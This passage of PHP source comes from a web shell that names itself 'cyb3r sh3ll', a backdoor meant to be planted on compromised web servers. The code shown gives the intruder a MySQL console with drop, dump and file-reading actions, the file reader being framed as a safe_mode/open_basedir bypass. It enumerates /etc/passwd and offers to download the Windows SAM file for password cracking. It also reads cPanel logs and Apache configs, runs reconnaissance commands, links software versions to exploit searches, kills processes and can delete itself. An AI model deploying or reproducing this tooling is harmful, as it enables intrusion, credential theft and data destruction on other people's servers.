2689 echo "<td>".$size."</td>";
2690
2691 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
2692
2693 echo "</tr>";
2694
2695 $i++;
2696
2697 }
2698
2699 echo "<tr bgcolor=\"000000\">";
2700
2701 echo "<td><center><b>»</b></center></td>";
2702
2703 echo "<td><center><b>".$i." table(s)</b></center></td>";
2704
2705 echo "<td><b>".$trows."</b></td>";
2706
2707 echo "<td>".$row[1]."</td>";
2708
2709 echo "<td>".$row[10]."</td>";
2710
2711 echo "<td>".$row[11]."</td>";
2712
2713 echo "<td><b>".view_size($tsize)."</b></td>";
2714
2715 echo "<td></td>";
2716
2717 echo "</tr>";
2718
2719 echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
2720
2721 echo "<option value=\"\">With selected:</option>";
2722
2723 echo "<option value=\"tbldrop\">Drop</option>";
2724
2725 echo "<option value=\"tblempty\">Empty</option>";
2726
2727 echo "<option value=\"tbldump\">Dump</option>";
2728
2729 echo "<option value=\"tblcheck\">Check table</option>";
2730
2731 echo "<option value=\"tbloptimize\">Optimize table</option>";
2732
2733 echo "<option value=\"tblrepair\">Repair table</option>";
2734
2735 echo "<option value=\"tblanalyze\">Analyze table</option>";
2736
2737 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
2738
2739 mysql_free_result($result);
2740
2741 }
2742
2743 }
2744
2745 }
2746
2747 }
2748
2749 }
2750
2751 else
2752
2753 {
2754
2755 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
2756
2757 if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
2758
2759 if (!empty($sql_act))
2760
2761 {
2762
2763 echo "<hr size=\"1\" noshade>";
2764
2765 if ($sql_act == "newdb")
2766
2767 {
2768
2769 echo "<b>";
2770
2771 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
2772
2773 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
2774
2775 }
2776
2777 if ($sql_act == "serverstatus")
2778
2779 {
2780
2781 $result = mysql_query("SHOW STATUS", $sql_sock);
2782
2783 echo "<center><b>Server-status variables:</b><br><br>";
2784
2785 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
2786
2787 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
2788
2789 echo "</table></center>";
2790
2791 mysql_free_result($result);
2792
2793 }
2794
2795 if ($sql_act == "servervars")
2796
2797 {
2798
2799 $result = mysql_query("SHOW VARIABLES", $sql_sock);
2800
2801 echo "<center><b>Server variables:</b><br><br>";
2802
2803 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
2804
2805 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
2806
2807 echo "</table>";
2808
2809 mysql_free_result($result);
2810
2811 }
2812
2813 if ($sql_act == "processes")
2814
2815 {
2816
2817 if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
2818
2819 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
2820
2821 echo "<center><b>Processes:</b><br><br>";
2822
2823 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#15354c borderColorLight=#15354c border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
2824
2825 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
2826
2827 echo "</table>";
2828
2829 mysql_free_result($result);
2830
2831 }
2832
2833 if ($sql_act == "getfile")
2834
2835 {
2836
2837 $tmpdb = $sql_login."_tmpdb";
2838
2839 $select = mysql_select_db($tmpdb);
2840
2841 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
2842
2843 if ($select)
2844
2845 {
2846
2847 $created = FALSE;
2848
2849 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
2850
2851 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
2852
2853 $result = mysql_query("SELECT * FROM tmp_file;");
2854
2855 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
2856
2857 else
2858
2859 {
2860
2861 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
2862
2863 $f = "";
2864
2865 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
2866
2867 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
2868
2869 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
2870
2871 mysql_free_result($result);
2872
2873 mysql_query("DROP TABLE tmp_file;");
2874
2875 }
2876
2877 }
2878
2879 mysql_drop_db($tmpdb); //comment it if you want to leave database
2880
2881 }
2882
2883 }
2884
2885 }
2886
2887 }
2888
2889 echo "</td></tr></table>";
2890
2891 if ($sql_sock)
2892
2893 {
2894
2895 $affected = @mysql_affected_rows($sql_sock);
2896
2897 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
2898
2899 echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
2900
2901 }
2902
2903 echo "</table>";
2904
2905}
2906
2907if ($act == "mkdir")
2908{
2909
2910 if ($mkdir != $d)
2911 {
2912
2913 if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
2914
2915 elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
2916
2917 echo "<br><br>";
2918
2919 }
2920
2921 $act = $dspact = "ls";
2922
2923}
2924
2925if ($act == "d")
2926
2927{
2928
2929 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
2930
2931 else
2932
2933 {
2934
2935 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
2936
2937 if (!$win)
2938
2939 {
2940
2941 echo "<tr><td><b>Owner/Group</b></td><td> ";
2942
2943 $ow = posix_getpwuid(fileowner($d));
2944
2945 $gr = posix_getgrgid(filegroup($d));
2946
2947 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
2948
2949 }
2950
2951 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
2952
2953 }
2954
2955}
2956
2957
2958if ($act == "security")
2959{
2960
2961 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
2962
2963 if (!$win)
2964
2965 {
2966
2967 if ($nixpasswd)
2968
2969 {
2970
2971 if ($nixpasswd == 1) {$nixpasswd = 0;}
2972
2973 echo "<b>*nix /etc/passwd:</b><br>";
2974
2975 if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
2976
2977 if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
2978
2979 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
2980
2981 $i = $nixpwd_s;
2982
2983 while ($i < $nixpwd_e)
2984
2985 {
2986
2987 $uid = posix_getpwuid($i);
2988
2989 if ($uid)
2990
2991 {
2992
2993 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
2994
2995 echo join(":",$uid)."<br>";
2996
2997 }
2998
2999 $i++;
3000
3001 }
3002
3003 }
3004
3005 else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
3006
3007 }
3008
3009 else
3010 {
3011 $v = $_SERVER["WINDIR"]."\repair\sam";
3012
3013 if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
3014
3015 else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
3016 }
3017
3018 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
3019
3020 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
3021
3022 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
3023
3024 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
3025
3026 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
3027
3028 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
3029
3030 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
3031
3032 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
3033
3034 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
3035
3036 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
3037
3038 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
3039
3040 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
3041
3042 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
3043
3044 displaysecinfo("RAM",myshellexec("free -m"));
3045
3046 displaysecinfo("HDD space",myshellexec("df -h"));
3047
3048 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
3049
3050 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
3051
3052 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
3053
3054 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
3055
3056 displaysecinfo("Is links installed?",myshellexec("which links"));
3057
3058 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
3059
3060 displaysecinfo("Is GET installed?",myshellexec("which GET"));
3061
3062 displaysecinfo("Is perl installed?",myshellexec("which perl"));
3063
3064 displaysecinfo("Where is apache",myshellexec("whereis apache"));
3065
3066 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
3067
3068 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
3069
3070 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
3071
3072 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
3073
3074 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
3075
3076}
3077
3078if ($act == "mkfile")
3079
3080{
3081 if ($mkfile != $d)
3082
3083 {
3084 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
3085
3086 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
3087
3088 else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
3089
3090 }
3091 else {$act = $dspact = "ls";}
3092
3093}
3094
3095if ($act == "encoder")
3096
3097{
3098 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
3099
3100 foreach(array("md5","crypt","sha1","crc32") as $v)
3101
3102 {
3103 echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
3104 }
3105
3106 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
3107
3108 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
3109
3110 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
3111
3112 echo "<center>base64_decode - ";
3113
3114 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
3115
3116 else
3117
3118 {
3119
3120 $debase64 = base64_decode($encoder_input);
3121
3122 $debase64 = str_replace("\0","[0]",$debase64);
3123
3124 $a = explode("\r\n",$debase64);
3125
3126 $rows = count($a);
3127
3128 $debase64 = htmlspecialchars($debase64);
3129
3130 if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
3131
3132 else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
3133
3134 echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
3135
3136 }
3137
3138 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
3139
3140 $c = strlen($encoder_input);
3141
3142 for($i=0;$i<$c;$i++)
3143
3144 {
3145 $hex = dechex(ord($encoder_input[$i]));
3146
3147 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
3148
3149 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
3150 }
3151
3152 echo "\" readonly><br></center></form>";
3153
3154}
3155
3156if ($act == "selfremove")
3157{
3158 if (($submit == $rndcode) and ($submit != ""))
3159
3160 {
3161
3162 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using cyb3r sh3ll v.".$shver."!"; cyb3rexit(); }
3163
3164 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
3165
3166 }
3167
3168 else
3169
3170 {
3171
3172 if (!empty($rndcode)) {echo "<b>Error: Incorrect Confimation!</b>";}
3173
3174 $rnd = rand(0,9).rand(0,9).rand(0,9);
3175
3176 echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
3177
3178 }
3179
3180}
3181
3182if ($act == "serverinfo")
3183{
3184
3185global $windows,$disablefunctions,$safemode;
3186$cwd= getcwd();
3187$mil="<a target=\"_blank\" href=\"http://www.exploit-db.com/search/?action=search&filter_exploit_text=";
3188$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
3189if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
3190$osver=$tsize=$fsize='';
3191if ($windows){
3192$osver = " (".shelL("ver").")";
3193$sysroot = shelL("echo %systemroot%");
3194if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
3195if (empty($sysroot)) $sysroot = getenv("windir");
3196if (empty($sysroot)) $sysroot = "Not Found";
3197if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
3198for ($i=66;$i<=90;$i++){
3199$drive= chr($i).':\\';
3200if (is_dir($drive)){
3201$fsize+=@disk_free_space($drive);
3202$tsize+=@disk_total_space($drive);
3203}
3204}
3205}else{
3206$fsize=disk_free_space('/');
3207$tsize=disk_total_space('/');
3208}
3209$disksize="Used Space: ". showsizE($tsize-$fsize) . " Free Space: ". showsizE($fsize) . " Total Space: ". showsizE($tsize);
3210if (empty($CPU)) $CPU = "Unknown";
3211$os = php_unamE();
3212$osn=php_unamE('s');
3213if(!$windows){
3214$ker = php_unamE('r');
3215$o=($osn=="Linux")?"Linux+Kernel":$osn;
3216$os = str_replace($osn,"${mil}$o\"><font color='yellow'>$osn</font></a>",$os);
3217$os = str_replace($ker,"${mil}Linux+Kernel\"><font color='yellow'>$ker</font></a>",$os);
3218$inpa=':';
3219}else{
3220$sam = $sysroot."\\system32\\config\\SAM";
3221$inpa=';';
3222$os = str_replace($osn,"${mil}MS+Windows\"><font color='yellow'>$osn</font></a>",$os);
3223}
3224$software=str_replace("Apache","${mil}Apache\"><font color='#66ffff'>Apache</font></a>",$_SERVER['SERVER_SOFTWARE']);
3225echo "
3226<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\" >
3227 <tr><td><b>Server information:</b></td></tr>
3228 <tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td>
3229 <td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"];
3230if (!empty($_SERVER["SERVER_ADDR"])){
3231 echo "(". $_SERVER["SERVER_ADDR"] .")";}
3232echo "
3233</td></tr>
3234<tr><td width=\"25%\" >Operation System:</td> <td >$os$osver</td></tr>
3235<tr><td width=\"25%\" bgcolor=\"#666666\">Web server Application:</td> <td bgcolor=\"#666666\">$software</td></tr>
3236<tr><td width=\"25%\" >CPU:</td> <td >$CPU</td></tr>
3237 <td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr>
3238<tr><td width=\"25%\" >User domain:</td><td >";
3239if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];
3240else echo "Unknown";
3241echo "
3242</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><a href=\"".$surl."act=processes\" ><font color=#66ffff>User Name </font>:</a></td>
3243<td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();
3244else echo "Unknown"; echo "</td></tr>";
3245if ($windows){
3246echo "
3247<tr><td width=\"25%\" >Windows directory:</td><td ><a href=\"".$surl."act=ls&d=$sysroot"."\"><font color=yellow>$sysroot</font></a></td></tr><tr>
3248<td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";
3249if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">
3250<font color=#66ffff>Readable</font></a>"; else echo "Not readable";echo "</td></tr>";
3251}
3252else
3253{
3254echo "<tr><td width=\"25%\" >Passwd file:</td><td >";
3255if (is_readable('/etc/passwd')) echo "
3256<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
3257if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\"><font color=#66ffff>Readable</font></a>"; else echo "Not readable";}else echo "Not found";
3258echo "</td></tr>";
3259}
3260$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
3261echo "
3262<tr><td width=\"25%\" >${mil}PHP\"><font color=yellow>PHP</font></a> version:</td>
3263<td ><a href=\"?=".php_logo_guid()."\" target=\"_blank\"><font color=yellow>".PHP_VERSION."</font></a>
3264(<a href=\"".$surl."act=phpinfo\"><font color=yellow>more...</font></a>)</td></tr>
3265<tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td>
3266<td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\"><font color=#66ffff>".zend_version()."</font></a>";
3267else echo "Not Found";echo "</td>
3268<tr><td width=\"25%\" >Include path:</td>
3269<td >".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td>
3270<tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td>
3271<td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";
3272echo "</td><tr><td width=\"25%\" >Disabled functions:</td><td >";
3273if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr>
3274<tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$sfmode</font></td></tr>
3275<tr><td width=\"25%\" >Open base dir:</td><td >$basedir</td></tr>
3276<tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td>
3277<td bgcolor=\"#666666\">";$sq="";
3278if(function_exists('mysql_connect')) $sq= "${mil}MySQL\"><font color=#66ffff>MySQL</font></a> ";
3279if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\"><font color=#66ffff>MSSQL</font></a> ";
3280if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\"><font color=#66ffff>Oracle</font></a> ";
3281if(function_exists('sqlite_open')) $sq.= " SQLite ";
3282if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\"><font color=#66ffff>PostgreSQL</font></a> ";
3283if(function_exists('msql_connect')) $sq.= " mSQL ";
3284if(function_exists('mysqli_connect'))$sq.= " MySQLi ";
3285if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";
3286if ($sq=="") $sq= "Nothing";
3287
3288echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" >cURL support:</td><td >Enabled ";
3289if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "</table>";
3290
3291}
3292
3293if ($act == "clientinfo")
3294{
3295echo "<table><tr><td><b>User information</b>:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">".$_SERVER['REMOTE_ADDR']."</td></tr><tr><td width=\"25%\" >Agent:</td><td >".getenv('HTTP_USER_AGENT')."</td></tr></table>";
3296}
3297
3298if ($act == "processes")
3299
3300{
3301
3302 echo "<b>Processes:</b><br>";
3303
3304 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
3305
3306 else {$handler = "tasklist";}
3307
3308 $ret = myshellexec($handler);
3309
3310 if (!$ret) {echo "Can't execute \"".$handler."\"!";}
3311
3312 else
3313
3314 {
3315
3316 if (empty($processes_sort)) {$processes_sort = $sort_default;}
3317
3318 $parsesort = parsesort($processes_sort);
3319
3320 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
3321
3322 $k = $parsesort[0];
3323
3324 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3325
3326 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3327
3328 $ret = htmlspecialchars($ret);
3329
3330 if (!$win)
3331
3332 {
3333
3334 if ($pid)
3335
3336 {
3337
3338 if (is_null($sig)) {$sig = 9;}
3339
3340 echo "Sending signal ".$sig." to #".$pid."... ";
3341
3342 if (posix_kill($pid,$sig)) {echo "OK.";}
3343
3344 else {echo "ERROR.";}
3345
3346 }
3347
3348 while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
3349
3350 $stack = explode("\n",$ret);
3351
3352 $head = explode(" ",$stack[0]);
3353
3354 unset($stack[0]);
3355
3356 for($i=0;$i<count($head);$i++)
3357
3358 {
3359
3360 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
3361
3362 }
3363
3364 $prcs = array();
3365
3366 foreach ($stack as $line)
3367
3368 {
3369
3370 if (!empty($line))
3371
3372{
3373
3374 echo "<tr>";
3375
3376 $line = explode(" ",$line);
3377
3378 $line[10] = join(" ",array_slice($line,10));
3379
3380 $line = array_slice($line,0,11);
3381
3382 if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
3383
3384 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
3385
3386 $prcs[] = $line;
3387
3388 echo "</tr>";
3389
3390 }
3391
3392 }
3393
3394 }
3395
3396 else
3397
3398 {
3399
3400 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3401
3402 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3403
3404 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3405
3406 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3407
3408 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3409
3410 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3411
